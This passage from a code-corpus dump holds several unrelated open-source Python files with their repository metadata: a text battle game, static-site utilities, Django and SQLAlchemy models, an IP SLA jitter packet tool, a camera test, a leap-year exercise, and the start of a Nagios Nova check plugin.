        print "You wrote: "+self.textfield.GetValue()
        self.Destroy()
# Create the application (False = don't redirect stdout) and run the GUI loop.
app = wx.App(False)
frame = MyFrame()
app.MainLoop()
|
UTF-8
|
Python
| false | false | 2,012 |
19,430,432,070,512 |
a92a99cbc5b910b46365c189abb97608c9815215
|
54455d89dbd40966ce2c137b857759fa97981e55
|
/t1.py
|
ce6ccb603f430ad8b50864adc27b6e204310f2d9
|
[] |
no_license
|
altarim992/Peak
|
https://github.com/altarim992/Peak
|
94c99f382c0726fa1a69cc52ebdc09216f8e875d
|
6abd875d5f9028e7121cbc086acf499cb6764fe1
|
refs/heads/master
| 2021-01-18T09:46:07.329104 | 2012-05-05T04:43:38 | 2012-05-05T04:43:38 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
import pickle
import player
from player import *
import weapons
from weapons import *
import combat
from combat import *
import enemies
from enemies import *
class Post(object):
    """Stationary target with a name and physical/mental stat values."""
    def __init__(self, name, physical, mental):
        self.name, self.physical, self.mental = name, physical, mental
te = Post("Pole", 33, 1)
"""
class Dog(object):
def __init__(self,physical,mental,dmg,acc):
self.physical = physical
self.mental = mental
self.dmg = dmg
self.acc = acc
def statusUpdate():
print "Wolf Status:"
print "Physical: ",self.physical
print "Mental: ",self.mental
def death():
if beastHP < 1:
alive = False
Wolf = Dog(8,1,3,95)
"""
def statDump():
    # Print the player character's name and stats (Python 2 print).
    # NOTE(review): relies on a module-global PC -- presumably provided by
    # one of the star-imports above; confirm.
    print PC.name
    print "Physical: ",PC.physical
    print "Mental: ",PC.mental
# Old win-condition check, disabled by wrapping it in a string literal.
"""
def checkWin():
    global battle
    if Wolf.physical < 1:
        battle = False
        print "you killed the wolf!"
    if PC.physical < 1:
        battle = False
        print "you died!"
"""
# loadChar = open('save/pc/matt.creature', 'r+')
# PC = pickle.load(loadChar)

# Text menu shown when the player enters an unrecognized command.
menu = """
+--------------+
|$ | COMMANDS |
+--------------+
|e | LOAD ENEMY
|f | FIGHT
|q | QUIT
"""

# Main battle loop: read one command per turn until the player quits.
# (fight() / enemyLoad() / neighbor1 are expected from the star-imports.)
battle = True
bcount = 0
while battle == True:
    act = raw_input("Your turn> ")
    if act.lower() in ['f']:
        fight()
        # hack()
        # print te.tgt
    elif act.lower() in ['q']:
        battle = False
        # print bcount
    elif act.lower() in ['e']:
        enemyLoad(neighbor1)
    else:
        print menu
    # bcount +=1

# Older turn-based combat loop, kept for reference (disabled as a string).
"""
while battle == True:
    # iTell()
    statDump()
    if turn/2 == turn / 2.0:
        print menu
        act = raw_input("what do you do? ")
        if act.lower() in ['inventory']:
            print "You have a splitter and an axe,"
            print "And you currently have",itemOut,"equipped."
            iact = raw_input("Would you like to switch(Y/n) ")
            if iact.lower() in ['y']:
                switch()
            else:
                print "ok, but you still lost a turn"
                turn += 1
        elif act.lower() in ['axe','attack','hit','fight']:
            if weaponID.lower in ['axe']:
                attack()
            else:
                rifle()
            checkWin()
            turn += 1
        else:
            print "invalid"
    else:
        wAtk = random.randint(0,100)
        missB2 = Wolf.acc
        if wAtk <= missB2:
            PC.physical -= Wolf.dmg
            print "the wolf strikes!"
            print "the wolf did",Wolf.dmg,"damage"
        else:
            print "the wolf missed!"
        checkWin()
        turn += 1
"""
|
UTF-8
|
Python
| false | false | 2,012 |
19,104,014,573,567 |
dae653d6be7a05b7720521e1469be44ef189cf3a
|
17e11ad753d342eaed4f4e265583284e69386edb
|
/clay/utils.py
|
e956c53758d431a3e7db294b4cc5bde0b26d325b
|
[
"MIT"
] |
permissive
|
plaes/Clay
|
https://github.com/plaes/Clay
|
37397578c9b5181c817302fe809a1307753e2e50
|
ce33d7b273dd743f1f86356862d55abde8b2eb92
|
refs/heads/master
| 2020-02-03T04:56:13.084586 | 2012-08-14T01:26:19 | 2012-08-14T01:26:19 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
"""
# Clay.utils
"""
from datetime import datetime, date, time
from decimal import Decimal
import errno
import io
import math
import os
import re
import shutil
try:
import simplejson as json
except ImportError:
try:
import json
except ImportError:
pass
import types
def is_binary(filepath):
    """Return True if the file at *filepath* looks binary.

    Reads the file in 1 KiB chunks and reports binary as soon as a NUL
    byte is found; a short final chunk ends the scan.
    """
    CHUNKSIZE = 1024
    with io.open(filepath, 'rb') as f:
        while 1:
            chunk = f.read(CHUNKSIZE)
            # Compare against a *bytes* literal: the file is opened in binary
            # mode, so chunks are bytes (fixes a str/bytes mismatch on Py3;
            # on Py2, b'\0' == '\0' so behavior is unchanged).
            if b'\0' in chunk:  # found null byte
                return True
            if len(chunk) < CHUNKSIZE:
                break
    return False
def walk_dir(path, callback, ignore=None):
    """Recursively visit every file under *path*, calling *callback* with the
    file's path relative to *path*. Names starting with any prefix in
    *ignore* (a tuple of strings) are skipped.
    """
    skip_prefixes = ignore or ()
    for folder, subs, files in os.walk(path):
        rel_folder = os.path.relpath(folder, path)
        for name in files:
            if name.startswith(skip_prefixes):
                continue
            # Strip the './' produced for the top-level folder.
            rel = os.path.join(rel_folder, name) \
                .lstrip('.').lstrip('/').lstrip('\\')
            callback(rel)
def make_dirs(*lpath):
    """Join *lpath* into one (unicode) path, create its parent directories,
    and return the joined path.

    An already-existing directory is not an error; any other OSError is
    re-raised.
    """
    path = to_unicode(os.path.join(*lpath))
    try:
        os.makedirs(os.path.dirname(path))
    except OSError as e:  # py3-compatible syntax (was: `except (OSError), e`)
        if e.errno != errno.EEXIST:
            raise
    return path
def get_source(filepath):
    """Return the UTF-8 decoded text contents of *filepath*."""
    with io.open(filepath, encoding='utf-8') as source_file:
        return source_file.read()
def make_file(filepath, content):
    """Write *content* to *filepath* as UTF-8 text, creating or overwriting it.

    Byte strings are decoded from UTF-8 first (portable replacement for the
    Py2-only ``unicode(content, 'utf-8')`` the original used).
    """
    if isinstance(content, bytes):
        content = content.decode('utf-8')
    with io.open(filepath, 'w+t', encoding='utf-8') as f:
        f.write(content)
def remove_file(filepath):
    """Best-effort delete of *filepath*; a missing file is not an error."""
    try:
        os.remove(filepath)
    except OSError:
        return
def absolute_to_relative(content, relpath, theme_prefix=''):
    """Rewrite absolute src/href URLs in *content* so they are relative to
    *relpath* (the page's path inside the site); a bare "/" becomes the
    relative index.html. When *theme_prefix* is given, that leading path
    segment is stripped from matched URLs as well.
    """
    # One "../" per directory level the page sits below the site root.
    up_levels = '../' * relpath.count('/')
    relative_repl = r' \1="%s\2"' % up_levels

    if theme_prefix:
        escaped_prefix = theme_prefix.strip('/').replace(r'/', r'\/') + r'\/+'
        absolute_rx = r' (src|href)=[\'"]\/+(?:%s)?([^\'"]+)[\'"]' % escaped_prefix
    else:
        absolute_rx = r' (src|href)=[\'"]\/+([^\'"]+)[\'"]'
    content = re.sub(absolute_rx, relative_repl, content)

    # A reference to the site root ("/") maps to the relative index page.
    root_rx = r' (src|href)=[\'"]\/[\'"]'
    index_repl = r' \1="%sindex.html"' % up_levels
    return re.sub(root_rx, index_repl, content)
def get_processed_regex(processed_files):
    """Build [compiled-pattern, replacement] pairs mapping each old asset name
    found in src/href attributes to its processed name, preserving any query
    string or fragment that follows it.
    """
    pairs = []
    for old_name, new_name in processed_files:
        pattern = re.compile(
            r' (?P<attr>src|href)=[\'"](?P<path>.*)%s(?P<args>(\?.*)?(\#.*)?)?[\'"]' % (old_name,))
        replacement = r' \g<attr>="\g<path>%s\g<args>"' % (new_name,)
        pairs.append([pattern, replacement])
    return pairs
def replace_processed_names(content, rx_processed):
    """Apply every (pattern, replacement) pair from get_processed_regex()
    to *content* and return the rewritten text."""
    for pattern, replacement in rx_processed:
        content = re.sub(pattern, replacement, content)
    return content
def get_file_mdate(filepath):
    """Return the file's modification time as a naive *local* datetime.

    Computed as the UTC timestamp shifted by the current UTC/local offset.
    """
    timestamp = os.path.getmtime(filepath)
    utc_offset = datetime.utcnow() - datetime.now()
    return datetime.utcfromtimestamp(timestamp) - utc_offset
def copy_if_has_change(path_in, path_out):
if os.path.exists(path_out):
oldt = os.path.getmtime(path_out)
newt = os.path.getmtime(path_in)
if oldt == newt:
return
shutil.copy2(path_in, path_out)
def _is_protected_type(obj):
    """Determine if the object instance is of a protected type.

    Objects of protected types are preserved as-is when passed to
    to_unicode(strings_only=True).
    """
    # NOTE: Python 2 only -- relies on types.NoneType and the `long` builtin.
    return isinstance(obj, (
        types.NoneType,
        int, long,
        datetime, date, time,
        float, Decimal)
    )
def to_unicode(s, encoding='utf-8', strings_only=False, errors='strict'):
    """Returns a unicode object representing 's'. Treats bytestrings using the
    `encoding` codec.

    If strings_only is True, don't convert (some) non-string-like objects.

    --------------------------------
    Copied almost unchanged from Django <https://www.djangoproject.com/>
    Copyright © 2005-2011 Django Software Foundation.
    Used under the modified BSD license.
    """
    # NOTE: Python 2 only -- uses the unicode/basestring builtins and the
    # `except X, e` syntax.
    # Handle the common case first, saves 30-40% in performance when s
    # is an instance of unicode.
    if isinstance(s, unicode):
        return s
    if strings_only and _is_protected_type(s):
        return s
    encoding = encoding or 'utf-8'
    try:
        if not isinstance(s, basestring):
            if hasattr(s, '__unicode__'):
                s = unicode(s)
            else:
                try:
                    s = unicode(str(s), encoding, errors)
                except UnicodeEncodeError:
                    if not isinstance(s, Exception):
                        raise
                    # If we get to here, the caller has passed in an Exception
                    # subclass populated with non-ASCII data without special
                    # handling to display as a string. We need to handle this
                    # without raising a further exception. We do an
                    # approximation to what the Exception's standard str()
                    # output should be.
                    s = u' '.join([to_unicode(arg, encoding, strings_only,
                        errors) for arg in s])
        elif not isinstance(s, unicode):
            # Note: We use .decode() here, instead of unicode(s, encoding,
            # errors), so that if s is a SafeString, it ends up being a
            # SafeUnicode at the end.
            s = s.decode(encoding, errors)
    except UnicodeDecodeError, e:
        if not isinstance(s, Exception):
            raise UnicodeDecodeError(s, *e.args)
        else:
            # If we get to here, the caller has passed in an Exception
            # subclass populated with non-ASCII bytestring data without a
            # working unicode method. Try to handle this without raising a
            # further exception by individually forcing the exception args
            # to unicode.
            s = u' '.join([to_unicode(arg, encoding, strings_only,
                errors) for arg in s])
    return s
def to_bytestring(s, encoding='utf-8', strings_only=False, errors='strict'):
    """Returns a bytestring version of 's', encoded as specified in 'encoding'.

    If strings_only is True, don't convert (some) non-string-like objects.

    --------------------------------
    Copied almost unchanged from Django <https://www.djangoproject.com/>
    Copyright © Django Software Foundation and individual contributors.
    Used under the modified BSD license.
    """
    # NOTE: Python 2 only -- uses the unicode/basestring builtins.
    if strings_only and isinstance(s, (types.NoneType, int)):
        return s
    encoding = encoding or 'utf-8'
    if not isinstance(s, basestring):
        try:
            return str(s)
        except UnicodeEncodeError:
            if isinstance(s, Exception):
                # An Exception subclass containing non-ASCII data that doesn't
                # know how to print itself properly. We shouldn't raise a
                # further exception.
                return ' '.join([to_bytestring(arg, encoding, strings_only,
                    errors) for arg in s])
            return unicode(s).encode(encoding, errors)
    elif isinstance(s, unicode):
        return s.encode(encoding, errors)
    elif s and encoding != 'utf-8':
        # Already a bytestring in UTF-8: transcode to the requested codec.
        return s.decode('utf-8', errors).encode(encoding, errors)
    else:
        return s
def filter_to_json(source_dict):
    """Template-filter helper: serialize *source_dict* to a JSON string."""
    dumped = json.dumps(source_dict)
    return dumped
|
UTF-8
|
Python
| false | false | 2,012 |
5,609,227,297,854 |
3822537decb76553db84174ddeae11b2e1e742cf
|
1606fd006175c12254b30cd95a753586c5c9adb6
|
/landingpage/urls.py
|
d2868d298b820e537bb31d47b079ed7d5ebac6ef
|
[
"GPL-2.0-only"
] |
non_permissive
|
foutoucour/dogallowed
|
https://github.com/foutoucour/dogallowed
|
1a5c9288d060cba1705ace2f7b552deebc5b9a1a
|
ca195e287dc39a6461871e7114170861befe64cd
|
refs/heads/master
| 2016-08-03T13:26:15.596745 | 2014-06-18T12:43:58 | 2014-06-18T12:43:58 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from django.conf.urls import patterns, url

# Routes for the landing page app: the bare root URL maps to the
# ``landingpage`` view (old-style string view reference, Django <= 1.7).
urlpatterns = patterns(
    'landingpage',
    url(r'^$', 'landingpage.views.landingpage', name='landingpage'),
)
|
UTF-8
|
Python
| false | false | 2,014 |
6,330,781,815,536 |
cf5fed4c0d49676b0f084f9fb65ccb0a99eb563e
|
365823983efc8afd9770d53e3dd132436af388e1
|
/utils.py
|
1c8a02dd3d7b40199c29de79a408f833f1d5b1e8
|
[] |
no_license
|
panchicore/backgrounds
|
https://github.com/panchicore/backgrounds
|
d30bb071cfa64f87443291a330b86eff980bbb4a
|
818c7a69d14f0699db021a5121a9366e6e1909bd
|
refs/heads/master
| 2021-01-19T06:19:31.175966 | 2011-10-13T00:19:49 | 2011-10-13T00:19:49 | 1,385,090 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import os
import urllib
import urllib2
import simplejson
from django.conf import settings
__author__ = 'panchicore'
def get_json(url):
    """Fetch *url* over HTTP and return the decoded JSON payload."""
    request = urllib2.Request(url)
    opener = urllib2.build_opener()
    response = opener.open(request)
    return simplejson.load(response)
def download_image(url, id, name):
    """Download *url* into settings.DOWNLOAD_IMAGE_PATH/<id>/<name>,
    creating the per-id directory when it does not exist yet."""
    image = urllib.URLopener()
    download_path = os.path.join(settings.DOWNLOAD_IMAGE_PATH, str(id))
    if not os.path.exists(download_path):
        os.makedirs(download_path)
    image.retrieve(url, os.path.join(download_path, name) )
|
UTF-8
|
Python
| false | false | 2,011 |
4,105,988,753,835 |
2e3261e828065b4a37a3cb368047317c2106ebe3
|
cb4abb9f1d74881cffa7ecbdcc755973614edb96
|
/main/environ.py
|
07a21fc188c5e2c071c2b77b15e138e689174304
|
[] |
no_license
|
tpenha/BaixeAssista
|
https://github.com/tpenha/BaixeAssista
|
89edf2898c6a5d81452623b80d45e3cc5fcccfb3
|
5228ecd4121dd08b9b51fef8f4ad49dd9c3ffa49
|
refs/heads/master
| 2019-04-27T19:39:28.692221 | 2013-01-19T21:39:30 | 2013-01-19T21:39:30 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# coding: utf-8
import os, sys
def setup(skip=False):
    """Prepare the environment so a standalone script can use the project:
    point Django at the settings module (unless *skip*), put the project
    root on sys.path, and chdir into it."""
    if not skip:
        os.environ['DJANGO_SETTINGS_MODULE'] = "main.settings"
    script_dir = os.path.dirname(os.path.abspath(__file__))
    main_dir = os.path.dirname(script_dir)
    if main_dir not in sys.path:
        sys.path.append(main_dir)
    os.chdir(main_dir)
|
UTF-8
|
Python
| false | false | 2,013 |
13,082,470,387,517 |
e6c5e088fa00b813a6172b02b0221c0ef579b0fe
|
f0345463a035dcb6babf921d8049a020a416f06e
|
/ipsla.py
|
553ef5c4f77af48d0edca79ca993fbd3920b167c
|
[] |
no_license
|
zhutong/misc
|
https://github.com/zhutong/misc
|
b66be63734cbc7ff464ca51d8def153319d004e1
|
d16425472987f028f7e7d4c6f7a4e8292c4ca29c
|
refs/heads/master
| 2021-01-22T13:13:28.730466 | 2014-03-20T16:42:04 | 2014-03-20T16:42:04 | 17,203,178 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
__author__ = 'zhutong'
import struct
import time
def get_milliseconds():
    """Current whole-second wall-clock time in milliseconds, modulo 2**32."""
    whole_seconds = int(time.time())
    return whole_seconds * 1000 % 4294967296
def convert_string(string):
    """Convert a colon-separated hex string (e.g. '01:ff') to a raw byte string.

    Uses int(part, 16) instead of eval('0x%s' % part) so malformed or
    malicious input raises ValueError rather than executing code.
    """
    return ''.join(chr(int(part, 16)) for part in string.split(':'))
def pack_init_request(sn, dst_ip, udp_port, unknown):
    """Build the 52-byte IP SLA control (init) request packet.

    *dst_ip* is the 4-byte packed address (socket.inet_aton output).
    """
    fields = (1, sn, 52, 4, 16, dst_ip, udp_port, unknown, 1, 28)
    return struct.pack('!BBH4xHH4x4sHHHH24x', *fields)
def unpack_init_req(string):
    """Extract (sn, dst_ip, udp_port, unknown) from a 52-byte init request."""
    layout = '!xB14x4sHH28x'
    return struct.unpack(layout, string)
def pack_init_response(init_request):
    """Echo the init request back, rewriting the length byte (offset 3) to 24
    and truncating the payload to 24 bytes total."""
    head = init_request[:3]
    tail = init_request[4:24]
    return head + chr(24) + tail
def unpack_init_res(string):
    """Decode the 24-byte init response into its 11 numeric fields."""
    layout = '!BBH4xHH4x4BHH'
    return struct.unpack(layout, string)
def pack_jitter_request(sn):
    """Build a 32-byte UDP jitter probe request for sequence number *sn*,
    stamped with the current send time."""
    filler = 0xabcdabcdabcdabcd
    fields = (2, 0, get_milliseconds(), 0, sn, 0, filler, filler)
    return struct.pack('!HHIIHH2Q', *fields)
def unpack_jitter_req(string):
    """Decode a 32-byte jitter packet into its 8 fields."""
    layout = '!HHIIHH2Q'
    return struct.unpack(layout, string)
def unpack_jitter_request(string):
    # NOTE(review): exact duplicate of unpack_jitter_req above -- kept only
    # for callers that use this longer name.
    return struct.unpack('!HHIIHH2Q', string)
def pack_jitter_response(request):
    """Build the jitter response for *request*: echo its fields, stamp our
    receive time into field 3, and mirror the request's sequence number into
    both sequence slots (matching the captured responses below)."""
    req = unpack_jitter_req(request)
    fields = (req[0], req[1], req[2], get_milliseconds(), req[4], req[4], req[6], req[7])
    return struct.pack('!HHIIHH2Q', *fields)
def unpack_jitter_res(string):
    """Decode a 32-byte jitter response into its 8 fields."""
    layout = '!HHIIHH2Q'
    return struct.unpack(layout, string)
# Captured sample packets (colon-separated hex, one packet per line) used by
# the decode checks in __main__; convert with convert_string() before unpacking.
pcap_init_req = '''
01:b8:00:34:00:00:00:00:00:04:00:10:00:00:00:00:0a:4f:94:d3:27:10:1b:58:00:01:00:1c:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
01:b9:00:34:00:00:00:00:00:04:00:10:00:00:00:00:0a:4f:94:d3:27:10:1b:58:00:01:00:1c:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
01:ba:00:34:00:00:00:00:00:04:00:10:00:00:00:00:0a:4f:94:d3:27:10:1b:58:00:01:00:1c:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
01:64:00:34:00:00:00:00:00:04:00:10:00:00:00:00:c0:a8:dd:65:27:10:1b:58:00:01:00:1c:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
'''.strip().splitlines()
pcap_init_res = '''
01:b8:00:18:00:00:00:00:00:04:00:10:00:00:00:00:0a:4f:94:d3:27:10:1b:58
01:b9:00:18:00:00:00:00:00:04:00:10:00:00:00:00:0a:4f:94:d3:27:10:1b:58
01:ba:00:18:00:00:00:00:00:04:00:10:00:00:00:00:0a:4f:94:d3:27:10:1b:58
'''.strip().splitlines()
pcap_req = '''
00:02:00:00:05:0b:02:a6:00:00:00:00:00:01:00:00:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd
00:02:00:00:05:0b:02:b1:00:00:00:00:00:02:00:00:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd
00:02:00:00:05:0b:77:d7:00:00:00:00:00:01:00:00:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd
00:02:00:00:05:0b:77:e1:00:00:00:00:00:02:00:00:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd
'''.strip().splitlines()
pcap_res = '''
00:02:00:00:05:0b:02:a6:04:e6:3f:10:00:01:00:01:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd
00:02:00:00:05:0b:02:b1:04:e6:3f:1b:00:02:00:02:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd
00:02:00:00:05:0b:77:d7:04:e6:b4:3e:00:01:00:01:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd
00:02:00:01:05:0b:77:e1:04:e6:b4:47:00:02:00:02:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd
'''.strip().splitlines()
if __name__ == '__main__':
    import socket

    ip = '192.168.221.101'
    dst_ip = socket.inet_aton(ip)
    udp_port = 10000
    sn = 100
    unknown = 7000
    # Exercise the pack/unpack round trip once (results unused here; the
    # verification prints are commented out below).
    init_req = pack_init_request(sn, dst_ip, udp_port, unknown)
    init_res = pack_init_response(init_req)
    req = pack_jitter_request(sn)
    res = pack_jitter_response(req)
    # print unpack_init_req(init_req)
    # print unpack_init_res(init_res)
    # print unpack_jitter_req(req)[:6]
    # print unpack_jitter_res(res)[:6]
    #
    # for i in range(3):
    #     string = convert_string(pcap_init_req[i])
    #     print unpack_init_req(string)
    #     string = convert_string(pcap_init_res[i])
    #     print unpack_init_res(string)
    #
    # Decode the captured sample jitter packets (Python 2 print statements).
    for i in range(4):
        string = convert_string(pcap_req[i])
        print unpack_jitter_req(string)
        string = convert_string(pcap_res[i])
        print unpack_jitter_res(string)

    # Then act as a passive listener on UDP 10000: dump each jitter request
    # received (replying is commented out). Loops forever; s.close() below
    # is unreachable.
    address = ('192.168.100.106', 10000)
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.bind(address)
    start_time = time.time()
    while 1:
        message, ip = s.recvfrom(2048)
        p = unpack_jitter_req(message)
        print ip, '%6f'%(time.time() - start_time)
        print p[:6]
        # r = pack_jitter_response(message)
        # print unpack_jitter_res(r)
        # s.sendto(r, ip)
    s.close()
|
UTF-8
|
Python
| false | false | 2,014 |
13,408,887,908,772 |
6b60468d2347d68659057d955b29dfad5038d5e2
|
fe6f0c70a0f0a50cb4c7a75116b8fd6ec51fcce9
|
/src/missions/TestMissions.py
|
57c852e74a4d1010028822081d4ea4aaa0961771
|
[] |
no_license
|
mforkin/stratosphere
|
https://github.com/mforkin/stratosphere
|
0e737902e4cc4c1d0e46140cf9edba44564ec045
|
08812c1596d331b885b9ccc1df09c13111c75591
|
refs/heads/master
| 2020-06-02T21:49:48.133847 | 2014-08-23T05:34:56 | 2014-08-23T05:34:56 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import time
import threading
class CameraTestMission(threading.Thread):
    """Thread that exercises the camera: preview, a still capture, and a
    10-second video recording.

    NOTE(review): assumes ``self.components`` (a mapping with a 'camera'
    entry) is attached to the instance before start() -- __init__ does not
    set it; confirm with the mission launcher.
    """
    def __init__(self):
        threading.Thread.__init__(self)

    def run(self):
        camera = self.components.get('camera')
        camera.start_preview()
        # Fixed: was a bare `time.sleep` attribute access (a no-op), so the
        # capture fired before the preview settled. 2s matches the pause
        # used after the capture below -- confirm the intended duration.
        time.sleep(2)
        camera.capture('test.png')
        time.sleep(2)
        camera.start_recording('test.h264')
        camera.wait_recording(10)
        camera.stop_recording()
        camera.stop_preview()
|
UTF-8
|
Python
| false | false | 2,014 |
10,419,590,687,283 |
1541726c8ec41cb11f6544fc07bc8b37f7802570
|
d014d54479bed58cee4c66e49882150362e0011e
|
/src/cms/cms/model/document.py
|
e818bf88d92417f5daa2a8f33f6db821624707cb
|
[] |
no_license
|
freelizhun/eencms
|
https://github.com/freelizhun/eencms
|
3ca1389ddccf368f19fe1d7e125bd56aa4f2ee90
|
7426bc72b193d89e74891d6daec31de4f1ea4da0
|
refs/heads/master
| 2021-05-26T12:24:10.544269 | 2013-02-21T09:16:22 | 2013-02-21T09:16:22 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from sqlalchemy import Column
from sqlalchemy.types import Integer, String
from cms.model.meta import Base
class Document(Base):
    """SQLAlchemy model storing metadata about an uploaded file."""

    __tablename__ = "document"

    # Surrogate primary key.
    id = Column(Integer, primary_key=True)
    # Original file name (not a full path).
    filename = Column(String(255))
    # File size -- units not shown here; presumably bytes (TODO confirm).
    filesize = Column(Integer)
    # Where the file is stored (presumably a filesystem path -- confirm).
    filelocation = Column(String(255))
    # File type descriptor (MIME type or extension -- confirm with callers).
    filetype = Column(String(255))

    def __repr__(self):
        return "<Document id=%r;title=%s)>" % (self.id, self.filename)
|
UTF-8
|
Python
| false | false | 2,013 |
16,423,954,967,283 |
8b4c2f37494bf72bc937687e7336f3aa3999ce21
|
dfa85bba5567e0846fe7839fdb1496ea3297fe15
|
/cccmv/mitgliederverwaltung/models.py
|
5ff76ab55037f5c501cae1bc30cf6e6db8dca788
|
[
"GPL-3.0-only"
] |
non_permissive
|
gnomus/cccmv
|
https://github.com/gnomus/cccmv
|
58c8bea733528a7c4919c9089e80544666cdc3ad
|
8af06c28ffedee9f8bba3d57ae69121a6e7f5d17
|
refs/heads/master
| 2020-12-30T10:50:15.147706 | 2014-01-06T15:42:05 | 2014-01-06T15:42:05 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from django.db import models
# Create your models here.
class Erfa(models.Model):
    """A local chapter ("Erfa") with its contact details."""

    def __str__(self):
        return self.name

    name = models.CharField(max_length=200)
    anschrift = models.CharField(max_length=200)  # postal address
    email = models.CharField(max_length=200)
class Mitglied(models.Model):
    """A club member, identified by a "Chaosnummer" membership number."""

    def __str__(self):
        return str(self.chaosnummer) + ': ' + self.vorname + ' ' + self.nachname

    chaosnummer = models.IntegerField(default=0)   # membership number
    vorname = models.CharField(max_length=200)     # first name
    nachname = models.CharField(max_length=200)    # last name
    anschrift = models.CharField(max_length=200)   # postal address
    email = models.CharField(max_length=200)
    erfa = models.ForeignKey(Erfa)                 # chapter this member belongs to
|
UTF-8
|
Python
| false | false | 2,014 |
2,731,599,208,357 |
b9d66d1ed9b2c4350c9656786bb8801e6323fdaa
|
98c6ea9c884152e8340605a706efefbea6170be5
|
/examples/data/Assignment_2/odncas001/question1.py
|
52f408e05cc55dff9e1d29291c83171a9a6cc98a
|
[] |
no_license
|
MrHamdulay/csc3-capstone
|
https://github.com/MrHamdulay/csc3-capstone
|
479d659e1dcd28040e83ebd9e3374d0ccc0c6817
|
6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2
|
refs/heads/master
| 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
def leap_year(year):
    """Print whether *year* is a leap year under Gregorian rules.

    A year is a leap year when it is divisible by 400, or divisible by 4
    but not by 100.
    """
    is_leap = year % 400 == 0 or (year % 4 == 0 and year % 100 > 0)
    verdict = "is a leap year." if is_leap else "is not a leap year."
    print(year, verdict)
# Interactive entry point: prompt once and report on the given year.
# NOTE(review): eval() on raw user input is unsafe for untrusted input;
# int(input(...)) would be the safer equivalent here.
year=eval(input("Enter a year:\n"))
leap_year(year)
|
UTF-8
|
Python
| false | false | 2,014 |
13,091,060,342,704 |
75c50b548ba21cec59a1f855a9226867081883bd
|
4a3cf3ecbdd0e616b0f330ba5a39f76235f2503f
|
/nagios-plugins/check_nova
|
91be3169edf9d23740ba363b33c96bdbaa0ea9f1
|
[] |
no_license
|
Will-Yin/openstack-monitoring
|
https://github.com/Will-Yin/openstack-monitoring
|
8c0163585a5e06dd2765f61d243e6bbe7014fa5a
|
9c8a44364414c85cd59bae500cdd2262718a89e6
|
refs/heads/master
| 2021-05-07T23:00:23.392117 | 2014-05-20T15:00:42 | 2014-05-20T15:00:42 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/python
"""
** Copyright (C) 2014 Koffi Nogbe at gmail dot com
** This program is free software: you can redistribute it and/or modify
** it under the terms of the GNU General Public License as published by
** the Free Software Foundation, either version 3 of the License, or
** (at your option) any later version.
** This program is distributed in the hope that it will be useful,
** but WITHOUT ANY WARRANTY; without even the implied warranty of
** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
** GNU General Public License for more details.
** You should have received a copy of the GNU General Public License
** along with this program. If not, see <http://www.gnu.org/licenses/>.
** ***********************************
** This program allow you to monitor openstack nova service
** This is a content base monitor as oppose to just port check
** It create an instance and delete it and poll the time it takes to
** to create/delete. It use a config file openrc.cfg
** Syntax:
** check_cinder -C/--config [config file] -i/--instance [instance to create] -w/--warning [warning timeout] -c/--critical [ critical timeout ]
"""
import sys
import time
import argparse
from novaclient.client import Client
from nagioslib.nagioslib import *
# Standard Nagios plugin exit codes.
STATUS_OK = 0
STATUS_WARNING = 1
STATUS_CRITICAL = 2
STATUS_UNKNOWN = 3

# Fallback OpenStack credentials file used when -C/--config is not given.
defaultCFG = 'openrc.cfg'
def findServer(instancesList, instance):
    """Return True if an instance named *instance* is in *instancesList*.

    BUG FIX: the original fell off the end and implicitly returned None
    when no match was found; make the False case explicit so callers
    always get a real boolean.
    """
    for inst in instancesList:
        if inst.name == instance:
            return True
    return False
def main():
    """Parse CLI options, time a Nova server-list lookup for the named
    instance, print a Nagios status line and exit with the matching
    Nagios status code (OK/WARNING/CRITICAL).
    """
    parser = argparse.ArgumentParser(description="check_keystone nagios plugin for OpenStack Keystone")
    parser.add_argument("-C","--config", help="Openstack rc configuration file - default is openrc.cfg")
    parser.add_argument("-i","--instance", help="OpenStack instance to monitor", required=True)
    parser.add_argument("-w","--warning", help="Warning time to retrieve the user", required=True)
    parser.add_argument("-c","--critical", help="Critical time to retrieve the user", required=True)
    args = parser.parse_args()
    # Fall back to the bundled openrc.cfg when no config file is given.
    if args.config:
        configFile = args.config
    else:
        configFile = defaultCFG
    cred = credential(configFile)
    novaVersion = '1.1'
    startTime = time.time()
    # NOTE(review): bare except hides the real connection error; catching
    # the client's specific exceptions would aid debugging.
    try:
